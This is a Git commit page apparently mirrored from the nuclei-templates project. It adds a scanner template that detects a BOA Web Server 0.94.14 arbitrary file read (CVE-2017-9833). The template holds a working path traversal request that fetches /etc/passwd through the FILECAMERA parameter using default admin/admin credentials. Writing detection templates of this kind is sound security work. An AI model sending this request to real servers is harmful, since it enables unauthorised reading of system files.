daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create boa-web-fileread.yaml

patch-1
Roberto Nunes 2022-03-07 07:58:38 +09:00 committed by GitHub
parent f7e32b1f1f
commit eb0395422f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 27 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

27
boa-web-fileread.yaml Normal file
View File

@ -0,0 +1,27 @@
id: boa-web-fileRead
info:
name: BOA Web Server 0.94.14 - Access to arbitrary files as privileges
author: 0x_Akoko
severity: high
description: The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges. Without using access credentials.
reference:
- https://www.exploit-db.com/exploits/42290
- https://www.cvedetails.com/cve/CVE-2017-9833
tags: boa,fileread,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200